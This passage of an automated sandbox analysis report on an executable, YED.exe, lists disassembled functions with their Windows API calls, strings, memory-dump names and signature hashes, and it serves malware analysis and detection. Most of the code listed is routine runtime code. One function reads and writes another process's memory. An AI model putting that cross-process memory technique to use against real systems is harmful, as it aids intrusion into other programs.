Instruction Fuzzy Hash: C501BEA16B1615FBD20C55119E82FBBF35D9B26364F008021FD0C5A141F7F5ED3086B0

Uniqueness

Uniqueness Score: -1.00%

Function 00242DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0023F2DE,00243863,002E1444,?,0022FDF5,?,?,0021A976,00000010,002E1440,002113FC,?,002113C6), ref: 00242DFD
_free.LIBCMT ref: 00242E32
_free.LIBCMT ref: 00242E59
SetLastError.KERNEL32(00000000,00211129), ref: 00242E66
SetLastError.KERNEL32(00000000,00211129), ref: 00242E6F

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: f79051cfe69d2305947cd0ab5a96cf13e87c65dfdcd25a9963241d7b9d9f2cc5
Instruction ID: e0897034251e8dca9626df90875cca2a584f23b84ee20304369945afd61aecc0
Opcode Fuzzy Hash: f79051cfe69d2305947cd0ab5a96cf13e87c65dfdcd25a9963241d7b9d9f2cc5
Instruction Fuzzy Hash: B201F932775A02E7C61EAB377C89D2B2659EBD27A57F40025F815D2293EEB0DC394520

Uniqueness

Uniqueness Score: -1.00%

Function 0027000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 0027002B
ProgIDFromCLSID.OLE32(?,00000000), ref: 00270046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0026FF41,80070057,?,?), ref: 00270054
CoTaskMemFree.OLE32(00000000), ref: 00270064
CLSIDFromString.OLE32(?,?), ref: 00270070

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: a48d26c50e43790a3e14429adfe618399f2ebef9a4a0fe25e74ef1a6fa78dd1c
Instruction ID: 3b83e166ba43b9305e929888d525052f9229bd317f13f87fa361d231d33cf134
Opcode Fuzzy Hash: a48d26c50e43790a3e14429adfe618399f2ebef9a4a0fe25e74ef1a6fa78dd1c
Instruction Fuzzy Hash: A301A272610215FFDB114F68EC88BAA7AEDEF44761F248124F909D2210DB75DD549BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0027E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0027E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0027E9A5
Sleep.KERNEL32(00000000), ref: 0027E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0027E9B7
Sleep.KERNEL32 ref: 0027E9F3

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 32642924dadd138573108f9735bd21b05302062e0ddddb357062a6155dd594d8
Instruction ID: 830d36f6181d061d4f75c64783362345109b39b212ab78cf46ae663d2a25f8f7
Opcode Fuzzy Hash: 32642924dadd138573108f9735bd21b05302062e0ddddb357062a6155dd594d8
Instruction Fuzzy Hash: 6A015B32D11529DBCF009FE4E84DADDBB78BF0E301F114596EA06B2241CB309565CB62

Uniqueness

Uniqueness Score: -1.00%

Function 002710F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00271114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00270B9B,?,?,?), ref: 00271120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00270B9B,?,?,?), ref: 0027112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00270B9B,?,?,?), ref: 00271136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0027114D

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 0edc4654a0be7e20e781c0510ddd8be1cbecafc823301c856a80f5a22de2674e
Instruction ID: 3a49bc3b137ac718f4a606138f383f07bb2a8b1d3bc115539cca783bbbfbab07
Opcode Fuzzy Hash: 0edc4654a0be7e20e781c0510ddd8be1cbecafc823301c856a80f5a22de2674e
Instruction Fuzzy Hash: 32011975200215BFDB114FA9EC4DA6A3B6EEF8A3A0B604469FA49D7360DE31DD109A60

Uniqueness

Uniqueness Score: -1.00%

Function 00271014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0027102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00271036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00271045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0027104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00271062

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 12eb12cd31775a8b72ee2f2f895738ce3b01afab5b91958c5bbb09c6fb14ec99
Instruction ID: 65b5c3d4672a27ae75948a881523a391692afd383333d29eef8662d4143e4bda
Opcode Fuzzy Hash: 12eb12cd31775a8b72ee2f2f895738ce3b01afab5b91958c5bbb09c6fb14ec99
Instruction Fuzzy Hash: F8F06D35200312FBDB215FA8EC4DF563BADEF8A761F204424FE49C7250DE70D8608A60

Uniqueness

Uniqueness Score: -1.00%

Function 00270FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00270FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00270FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00270FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00270FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00271002

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: a5a6724a65bed132178d3ed591f122763b212e8b9185a2b84bf0e966de5ef529
Instruction ID: 5377f5ce8b9cb23cdc80d073ec82364728ca70ec87f5854fd1e7f4bd8fc3db5d
Opcode Fuzzy Hash: a5a6724a65bed132178d3ed591f122763b212e8b9185a2b84bf0e966de5ef529
Instruction Fuzzy Hash: 5CF04935200312EBDB215FA8AC4DF563BADEF8A762F204424FA49C6251DE70DC608A60

Uniqueness

Uniqueness Score: -1.00%

Function 0028030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 00280324
CloseHandle.KERNEL32(?), ref: 00280331
CloseHandle.KERNEL32(?), ref: 0028033E
CloseHandle.KERNEL32(?), ref: 0028034B
CloseHandle.KERNEL32(?), ref: 00280358
CloseHandle.KERNEL32(?), ref: 00280365

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: da46e07c3cfc67e2bc9c51c5fb139ffda944daae7ef6b60e68356a4f247150cc
Instruction ID: 0b424d8b8b9f26d9da40faa152d7e8551a84aec36eb6ad2e76718680dc48ab46
Opcode Fuzzy Hash: da46e07c3cfc67e2bc9c51c5fb139ffda944daae7ef6b60e68356a4f247150cc
Instruction Fuzzy Hash: 5601DC76802B029FCB30AF66D8C0806FBF9BE602053158A7ED19252971C7B0A968CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0024D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0024D752

Part of subcall function 002429C8: HeapFree.KERNEL32(00000000,00000000), ref: 002429DE
Part of subcall function 002429C8: GetLastError.KERNEL32(00000000,?,0024D7D1,00000000,00000000,00000000,00000000,?,0024D7F8,00000000,00000007,00000000,?,0024DBF5,00000000,00000000), ref: 002429F0

_free.LIBCMT ref: 0024D764
_free.LIBCMT ref: 0024D776
_free.LIBCMT ref: 0024D788
_free.LIBCMT ref: 0024D79A

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9167c2f76817a606744c1013649d4f9c83c6de7f309a7ea36dcbdbc9895e6c4d
Instruction ID: 75487a5bb8d87c1354421e7a5b0e6b3b9d0094d02adb869f7c872ccbd8a4713e
Opcode Fuzzy Hash: 9167c2f76817a606744c1013649d4f9c83c6de7f309a7ea36dcbdbc9895e6c4d
Instruction Fuzzy Hash: 62F03632965206EB9629EF66F9C5C16BBDDBB447107F41C06F048D7541C730FCA0CA64

Uniqueness

Uniqueness Score: -1.00%

Function 002422A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 002422BE

Part of subcall function 002429C8: HeapFree.KERNEL32(00000000,00000000), ref: 002429DE
Part of subcall function 002429C8: GetLastError.KERNEL32(00000000,?,0024D7D1,00000000,00000000,00000000,00000000,?,0024D7F8,00000000,00000007,00000000,?,0024DBF5,00000000,00000000), ref: 002429F0

_free.LIBCMT ref: 002422D0
_free.LIBCMT ref: 002422E3
_free.LIBCMT ref: 002422F4
_free.LIBCMT ref: 00242305

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 880e6aa0d25e6108f3bba710651bd336886c5ff64b1d5d641442e813137879fd
Instruction ID: 9994fca1a3738922489f828652c00a4dffbad11a63dd5b24fa9dc467554c7afa
Opcode Fuzzy Hash: 880e6aa0d25e6108f3bba710651bd336886c5ff64b1d5d641442e813137879fd
Instruction Fuzzy Hash: 7BF05EB08A11A1DB9B17AF57BC8980C3B68F7187607A0151BF814DA2B1CB711876EFE4

Uniqueness

Uniqueness Score: -1.00%

Function 002295C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 002295D4
StrokeAndFillPath.GDI32(?), ref: 002295F0
SelectObject.GDI32(?,00000000), ref: 00229603
DeleteObject.GDI32 ref: 00229616
StrokePath.GDI32(?), ref: 00229631

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: cfc2c73a7e3a6d843aabe25e7faf778942eba344992c9b7f16dd7ad7355bc88f
Instruction ID: 49bab884c6149a1431e4f22809f08857a8115d952b1e349a4e8e645b7da67da3
Opcode Fuzzy Hash: cfc2c73a7e3a6d843aabe25e7faf778942eba344992c9b7f16dd7ad7355bc88f
Instruction Fuzzy Hash: 8AF03C30055285EBDB125FA5FD5C7643BA5EB02322F148224F429590F2CB7589B5DF20

Uniqueness

Uniqueness Score: -1.00%

Function 00240F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 002410F9
__freea.LIBCMT ref: 00241117

Part of subcall function 00241537: _free.LIBCMT ref: 0024154F

Strings

a/p, xrefs: 002411DE
am/pm, xrefs: 0024117A

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 3c6d27a78ddfb579001944e1c75b2e0cdd2216b4021b971f668a3e9a5bfae2de
Instruction ID: e6bed07876e556486b0e5cfd43987b8d988da083d48032861c0ce2a6f30cdb27
Opcode Fuzzy Hash: 3c6d27a78ddfb579001944e1c75b2e0cdd2216b4021b971f668a3e9a5bfae2de
Instruction Fuzzy Hash: A3D1F231930207DADB2C9F68C895BFABBB0EF05700F244199E915AB654D3B59DF0CB91

Uniqueness

Uniqueness Score: -1.00%

Function 002961D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 00230242: EnterCriticalSection.KERNEL32(002E070C,002E1884,?,?,0022198B,002E2518,?,?,?,002112F9,00000000), ref: 0023024D
Part of subcall function 00230242: LeaveCriticalSection.KERNEL32(002E070C,?,0022198B,002E2518,?,?,?,002112F9,00000000), ref: 0023028A

Part of subcall function 002300A3: __onexit.LIBCMT ref: 002300A9

__Init_thread_footer.LIBCMT ref: 00296238

Part of subcall function 002301F8: EnterCriticalSection.KERNEL32(002E070C,?,?,00228747,002E2514), ref: 00230202
Part of subcall function 002301F8: LeaveCriticalSection.KERNEL32(002E070C,?,00228747,002E2514), ref: 00230235

Part of subcall function 0028359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002835E4
Part of subcall function 0028359C: LoadStringW.USER32(002E2390,?,00000FFF,?), ref: 0028360A

Strings

x#., xrefs: 0029636F
x#., xrefs: 00296353
x#., xrefs: 0029633A

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#.$x#.$x#.
API String ID: 1072379062-2340457610
Opcode ID: 184e0f47ae070dfc9a5855e4b004922a491426b99a6d49aaed4954f468b1b617
Instruction ID: 78aebe95c70378214a905a78c79470944012b544066a2d46b7051d57d5a01348
Opcode Fuzzy Hash: 184e0f47ae070dfc9a5855e4b004922a491426b99a6d49aaed4954f468b1b617
Instruction Fuzzy Hash: 99C17B71A20106AFDF24DF98C894EBEB7F9EF48300F558069E9059B291DB70E965CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00248A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00248B6E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00248B7A
__dosmaperr.LIBCMT ref: 00248B81

Strings

.#, xrefs: 00248A63

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr
String ID: .#
API String ID: 2434981716-197210044
Opcode ID: adcc6fd5105ec10fc55ea8ed203e79b8866256888e351573d7ceaa8d721075c8
Instruction ID: eb4e2219a58afd81e4a1160ce853b91b6da76087db3f5711005ee07970c142b8
Opcode Fuzzy Hash: adcc6fd5105ec10fc55ea8ed203e79b8866256888e351573d7ceaa8d721075c8
Instruction Fuzzy Hash: 05419170634055AFDB289F24DC84A7D7FD5DB45308F288199F884CB542DE71CC638750

Uniqueness

Uniqueness Score: -1.00%

Function 00272716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0027B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002721D0,?,?,00000034,00000800,?,00000034), ref: 0027B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00272760

Part of subcall function 0027B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0027B3F8

Part of subcall function 0027B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0027B355
Part of subcall function 0027B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00272194,00000034,?,?,00001004,00000000,00000000), ref: 0027B365
Part of subcall function 0027B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00272194,00000034,?,?,00001004,00000000,00000000), ref: 0027B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002727CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0027281A

Strings

@, xrefs: 00272832

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: d445473ab77be2c9d68b511d5444775d815ba461ad48665b718374ad57345d98
Instruction ID: f2d6dbb5d705826bf054d9d827ef521c04f7f312875aa4c09472499e12d2cdd0
Opcode Fuzzy Hash: d445473ab77be2c9d68b511d5444775d815ba461ad48665b718374ad57345d98
Instruction Fuzzy Hash: 12416D72900218AFDB15DFA4CD45BDEBBB8AF05700F108095FA59B7181DB706E99CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0024172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\YED.exe,00000104), ref: 00241769
_free.LIBCMT ref: 00241834
_free.LIBCMT ref: 0024183E

Strings

C:\Users\user\AppData\Roaming\YED.exe, xrefs: 00241760, 00241767, 00241796, 002417CE

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Roaming\YED.exe
API String ID: 2506810119-2101642235
Opcode ID: 72c3d95d5fb4f8278b0f19747587eb9ef813bb987dd09a4c47fbac6daf44a29a
Instruction ID: 58ce2db1787f190614d8064d9424f3b7ed4bb189c86d81bc9da08e6e46841f83
Opcode Fuzzy Hash: 72c3d95d5fb4f8278b0f19747587eb9ef813bb987dd09a4c47fbac6daf44a29a
Instruction Fuzzy Hash: 2A31AE71A50258EBDB29DF9ADC85D9EBBFCEB85310B104166F904DB211D7B08EA0CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0027C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 0027C306
DeleteMenu.USER32 ref: 0027C34C
DeleteMenu.USER32 ref: 0027C395

Strings

0, xrefs: 0027C2DF

Memory Dump Source

